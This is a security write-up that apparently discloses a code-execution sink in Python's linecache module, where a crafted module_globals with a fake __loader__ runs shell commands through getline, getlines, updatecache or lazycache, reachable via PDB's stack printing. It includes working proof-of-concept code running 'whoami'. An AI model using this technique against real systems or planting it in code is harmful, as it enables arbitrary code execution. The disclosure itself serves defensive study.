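On a possible RCE issue in the linecache library
I had some spare time over the last few days and went digging through the Python standard library for fun, and stumbled on a possible RCE issue in linecache. I put together a PoC to play with it, and it turns out that calling certain functions in this library carelessly really can lead to RCE. It is a not-so-obvious and rather interesting sink, so here is a write-up.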
Proof of Concept (PoC)
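linecache.getline fetches a given line of a given file and caches the file's contents. If its third argument is fully attacker-controlled, however, the result is RCE. The same holds for getlines and updatecache in linecache, and lazycache can also be part of the problem.
Take a look: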
import linecache
class evil():
    def __init__(self):
        self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
    '__name__': 'whoami',
    '__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
whoami runs successfully.

The last line of the code is the sink. It has the following variants:
a = linecache.getline('LamentXU', 114514, fake_moudle)
a = linecache.getlines('LamentXU', fake_moudle)
a = linecache.updatecache('LamentXU', fake_moudle)
All of them lead directly to RCE.
import linecache
class evil():
    def __init__(self):
        self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
    '__name__': 'whoami',
    '__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
a = linecache.getlines('LamentXU', fake_moudle)
a = linecache.updatecache('LamentXU', fake_moudle)

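Root Cause
A brief introduction to linecache
linecache is a module in the Python standard library. Sometimes a program needs a specific line of a file rather than reading it sequentially from the top. linecache is designed for this: it caches file contents so that any line can be fetched quickly.
Its main job is to read a requested line from a file and cache the whole file. Later requests for other lines of the same file are served from the cache, which avoids repeated file I/O and improves performance.
Suppose we have the following code: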
import linecache
print(linecache.getline('1.txt', 1).strip())
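This reads the first line of 1.txt and prints it. The first two arguments of getline are required: the file path and the line number (counted from 1). The third argument, module_globals, is optional; it is normally the global namespace of a module, and the default None is usually what you want.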
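To make the normal behaviour concrete, here is a minimal sketch that does not depend on 1.txt existing. The temporary file and the variable names (demo_path, first, missing) are made up for illustration; the only linecache calls used are getline, clearcache and the module-level cache dict.

```python
import linecache
import os
import tempfile

# Create a small throwaway file so the example is self-contained.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("first line\nsecond line\n")
    demo_path = fh.name

first = linecache.getline(demo_path, 1)      # line numbers start at 1
missing = linecache.getline(demo_path, 99)   # out of range: empty string, no exception

# After the first read the whole file sits in the module-level cache dict
# as a (size, mtime, lines, fullname) tuple.
size, mtime, lines, fullname = linecache.cache[demo_path]

print(repr(first), repr(missing), lines)

# Clean up the cache and the temporary file.
linecache.clearcache()
os.remove(demo_path)
```

Note that a missing line or a missing file never raises; getline simply returns an empty string, which is part of why the module_globals path tends to go unnoticed.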
However, linecache trusts whatever it finds in module_globals, so an attacker who can pass in a malicious module_globals gets RCE.
Exploit chain
Let's step into the function.
def getline(filename, lineno, module_globals=None):
    """Get a line for a Python source file from the cache.
    Update the cache if it doesn't contain an entry for this file already."""
    lines = getlines(filename, module_globals)
    if 1 <= lineno <= len(lines):
        return lines[lineno - 1]
    return ''
It calls getlines. Stepping in:
def getlines(filename, module_globals=None):
    """Get the lines for a Python source file from the cache.
    Update the cache if it doesn't contain an entry for this file already."""
    if filename in cache:
        entry = cache[filename]
        if len(entry) != 1:
            return cache[filename][2]
    try:
        return updatecache(filename, module_globals)
    except MemoryError:
        clearcache()
        return []
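linecache keeps a global dict named cache that holds the lines already cached. getlines first checks whether the file already has a complete entry in cache (a lazy entry is a 1-tuple and does not count). If it does not, getlines calls updatecache. Let's step in.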
def updatecache(filename, module_globals=None):
    """Update a cache entry and return its list of lines.
    If something's wrong, print a message, discard the cache entry,
    and return an empty list."""
    if filename in cache:
        if len(cache[filename]) != 1:
            cache.pop(filename, None)
    if not filename or (filename.startswith('<') and filename.endswith('>')):
        return []
    fullname = filename
    try:
        stat = os.stat(fullname)
    except OSError:
        basename = filename
        # Realise a lazy loader based lookup if there is one
        # otherwise try to lookup right now.
        if lazycache(filename, module_globals):
            try:
                data = cache[filename][0]()
                # print(data)
            except (ImportError, OSError):
                pass
            else:
                if data is None:
                    # No luck, the PEP302 loader cannot find the source
                    # for this module.
                    return []
                cache[filename] = (
                    len(data),
                    None,
                    [line + '\n' for line in data.splitlines()],
                    fullname
                )
                return cache[filename][2]
        # Try looking through the module search path, which is only useful
        # when handling a relative filename.
        if os.path.isabs(filename):
            return []
        for dirname in sys.path:
            try:
                fullname = os.path.join(dirname, basename)
            except (TypeError, AttributeError):
                # Not sufficiently string-like to do anything useful with.
                continue
            try:
                stat = os.stat(fullname)
                break
            except OSError:
                pass
        else:
            return []
    try:
        with tokenize.open(fullname) as fp:
            lines = fp.readlines()
    except OSError:
        return []
    if lines and not lines[-1].endswith('\n'):
        lines[-1] += '\n'
    size, mtime = stat.st_size, stat.st_mtime
    cache[filename] = size, mtime, lines, fullname
    return lines
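Reading the source above, the loader is only consulted when the filename is not a '<...>' pseudo-name and os.stat on it fails. The following harmless sketch checks that reading. RecordingLoader, demo_module and demo_not_on_disk.txt are hypothetical names invented for the example, and the loader only records how it was called instead of running anything.

```python
import linecache
import os
import tempfile

class RecordingLoader:
    """Harmless stand-in for a loader: it only records how it was called."""
    def __init__(self):
        self.calls = []

    def get_source(self, name):
        self.calls.append(name)
        return "from loader\n"

loader = RecordingLoader()
module_globals = {"__name__": "demo_module", "__loader__": loader}
linecache.clearcache()

# Case 1: the file exists, so os.stat succeeds and the loader is skipped.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("from disk\n")
    real_path = fh.name
on_disk = linecache.getline(real_path, 1, module_globals)
calls_after_real_file = list(loader.calls)

# Case 2: a '<...>' pseudo-filename returns early, before any lookup.
pseudo = linecache.getline("<demo>", 1, module_globals)
calls_after_pseudo = list(loader.calls)

# Case 3: a name that is neither on disk nor '<...>' falls through to the loader.
from_loader = linecache.getline("demo_not_on_disk.txt", 1, module_globals)

# Clean up the cache and the temporary file.
linecache.clearcache()
os.remove(real_path)
```

So for the sink to be reachable, the attacker needs a filename that does not resolve to a real file, which is trivially true for a name like 'LamentXU' in the PoC.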
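It first checks whether filename is already cached, and drops the entry if it is a complete (non-lazy) one. It then checks whether the file exists with os.stat. If it does not (OSError), execution continues in the except branch and calls lazycache, and then we reach the real sink: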
data = cache[filename][0]()
updatecache calls whatever callable is stored in our cache entry! So let's step into lazycache and see how it fills the cache.
def lazycache(filename, module_globals):
    """Seed the cache for filename with module_globals.
    The module loader will be asked for the source only when getlines is
    called, not immediately.
    If there is an entry in the cache already, it is not altered.
    :return: True if a lazy load is registered in the cache,
        otherwise False. To register such a load a module loader with a
        get_source method must be found, the filename must be a cachable
        filename, and the filename must not be already cached.
    """
    if filename in cache:
        # print(len(cache[filename]))
        if len(cache[filename]) == 1:
            return True
        else:
            return False
    # print('he')
    if not filename or (filename.startswith('<') and filename.endswith('>')):
        return False
    # Try for a __loader__, if available
    if module_globals and '__loader__' in module_globals:
        name = module_globals.get('__name__')
        loader = module_globals['__loader__']
        get_source = getattr(loader, 'get_source', None)
        # print(name, loader, get_source)
        if name and get_source:
            get_lines = functools.partial(get_source, name)
            cache[filename] = (get_lines,)
            return True
    return False
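This is where it gets interesting. The code expects module_globals to be a module's global namespace, which is why it looks for __name__ and __loader__. The function takes get_source straight off __loader__, binds __name__ as its argument, and stores the resulting functools.partial in cache as a 1-tuple (lazycache itself only returns True or False). So how do we exploit this?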
fake_moudle = {
    '__name__': 'whoami',
    '__loader__': evil()
}
We build this module_globals ourselves. Note that we supply our own __name__ and __loader__. All that is left is to put a malicious get_source on the evil class, and it will be called!
import linecache
class evil():
    def __init__(self):
        self.get_source = lambda a: __import__('os').system(a)
fake_moudle = {
    '__name__': 'whoami',
    '__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
Written like this, the command does run, but getline then raises an error. Look at the code:
try:
    data = cache[filename][0]()
    # print(data)
except (ImportError, OSError):
    pass
else:
    if data is None:
        # No luck, the PEP302 loader cannot find the source
        # for this module.
        return []
    cache[filename] = (
        len(data),
        None,
        [line + '\n' for line in data.splitlines()],
        fullname
    )
    return cache[filename][2]
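After the call, the return value is checked against None. Anything else is passed to len() and splitlines(), and the int returned by os.system supports neither. So the lambda also has to return None. The revised PoC: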
import linecache
class evil():
    def __init__(self):
        self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
    '__name__': 'whoami',
    '__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
This gives RCE without any error.
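The effect of the loader's return value can be checked without running any command. This is a sketch under assumptions: make_globals and FixedLoader are hypothetical helpers written for this example, and the filenames are arbitrary names that should not exist on disk.

```python
import linecache

def make_globals(return_value):
    """Build a module_globals dict whose loader returns a fixed value."""
    class FixedLoader:
        def get_source(self, name):
            return return_value
    return {"__name__": "demo_module", "__loader__": FixedLoader()}

# A string is treated as source text and split into lines.
linecache.clearcache()
text_result = linecache.getline("demo_missing_a", 2, make_globals("a\nb\n"))

# None means "no source available": updatecache returns [] and getline returns ''.
linecache.clearcache()
none_result = linecache.getline("demo_missing_b", 1, make_globals(None))

# An int (which is what os.system returns) is not None, so len(data) is
# attempted and fails with TypeError.
linecache.clearcache()
try:
    linecache.getline("demo_missing_c", 1, make_globals(0))
    int_error = None
except TypeError as exc:
    int_error = exc

linecache.clearcache()
print(repr(text_result), repr(none_result), type(int_error).__name__)
```

In all three cases get_source has already run by the time the return value is inspected, so returning None only keeps the call quiet; it is not what makes the code execute.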
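Special Tricks
If the arguments to lazycache are controllable, we can write arbitrary entries into cache. On its own this is not very useful, unless the server then invokes the callables that lazycache stored, like this: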
import linecache
class evil():
    def __init__(self):
        self.get_source = lambda : __import__('os').system('whoami')
fake_moudle = {
    '__name__': 'LamentXU',
    '__loader__': evil()
}
a = linecache.lazycache('1', fake_moudle)
for i in linecache.cache.values():
    for j in i:
        j.func()
This achieves RCE as well.
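A benign way to see that lazycache only registers the callable, and that a later lookup is what actually invokes it, is the sketch below. CountingLoader and the filename demo_lazy_entry are hypothetical. Depending on the Python version the stored object may be a functools.partial or a plain function, so the example only assumes that it is callable.

```python
import linecache

class CountingLoader:
    """Harmless loader that counts how often get_source is invoked."""
    def __init__(self):
        self.calls = 0

    def get_source(self, name):
        self.calls += 1
        return "lazy line\n"

loader = CountingLoader()
linecache.clearcache()

# Registration only: the loader is stored, not called.
registered = linecache.lazycache(
    "demo_lazy_entry", {"__name__": "demo", "__loader__": loader}
)
entry = linecache.cache["demo_lazy_entry"]
calls_before = loader.calls

# A later lookup, even without module_globals, resolves the lazy entry.
lines = linecache.getlines("demo_lazy_entry")
calls_after = loader.calls

linecache.clearcache()
print(registered, len(entry), calls_before, calls_after, lines)
```

This means a poisoned lazy entry stays dormant until any later code path asks linecache for that filename, so the write and the trigger do not have to happen in the same place.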
So What?
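At this point you may be wondering: how would the third argument of a linecache call ever be attacker-controlled? Let's see.
Python's PDB calls the following function: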
def print_stack_trace(self):
    try:
        for frame_lineno in self.stack:
            self.print_stack_entry(frame_lineno)
    except KeyboardInterrupt:
        pass
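PDB uses this function to print the stack (it backs the where command), and print_stack_entry is also called whenever PDB stops and shows its prompt. Let's step into print_stack_entry.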
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
    frame, lineno = frame_lineno
    if frame is self.curframe:
        prefix = '> '
    else:
        prefix = '  '
    self.message(prefix +
                 self.format_stack_entry(frame_lineno, prompt_prefix))
Step into format_stack_entry, which Pdb inherits from bdb.Bdb:
def format_stack_entry(self, frame_lineno, lprefix=': '):
    """Return a string with information about a stack entry.
    The stack entry frame_lineno is a (frame, lineno) tuple. The
    return string contains the canonical filename, the function name
    or '<lambda>', the input arguments, the return value, and the
    line of code (if it exists).
    """
    import linecache, reprlib
    frame, lineno = frame_lineno
    filename = self.canonic(frame.f_code.co_filename)
    s = '%s(%r)' % (filename, lineno)
    if frame.f_code.co_name:
        s += frame.f_code.co_name
    else:
        s += "<lambda>"
    s += '()'
    if '__return__' in frame.f_locals:
        rv = frame.f_locals['__return__']
        s += '->'
        s += reprlib.repr(rv)
    line = linecache.getline(filename, lineno, frame.f_globals)
    if line:
        s += lprefix + line.strip()
    return s
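Here frame.f_globals is passed to getline as the controllable argument, which completes the RCE. In other words, much like pickle, using PDB to debug a malicious dump can lead to remote code execution.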
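The path from a frame's globals to the loader can be traced with a harmless stand-in. In this sketch RecordingLoader, demo_module, probe and demo_not_on_disk.py are all hypothetical names. The code object is compiled under a filename that is assumed not to exist on disk, and the loader only records the call and hands back the source text.

```python
import bdb

SOURCE = "def probe():\n    import sys\n    return sys._getframe()\n"

class RecordingLoader:
    """Harmless loader: records the name it is asked for and returns SOURCE."""
    def __init__(self):
        self.calls = []

    def get_source(self, name):
        self.calls.append(name)
        return SOURCE

loader = RecordingLoader()
# These globals stand in for the namespace of untrusted code being debugged.
namespace = {"__name__": "demo_module", "__loader__": loader}

# Compile under a filename that is not on disk and run it in that namespace.
code = compile(SOURCE, "demo_not_on_disk.py", "exec")
exec(code, namespace)
frame = namespace["probe"]()   # a frame whose f_globals is our namespace

# format_stack_entry passes frame.f_globals to linecache.getline.
lineno = frame.f_code.co_firstlineno
entry = bdb.Bdb().format_stack_entry((frame, lineno))
print(entry)
```

The debugger never calls the loader directly; merely formatting a stack entry for a frame whose source file cannot be found is enough for linecache to ask the frame's own __loader__ for it.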
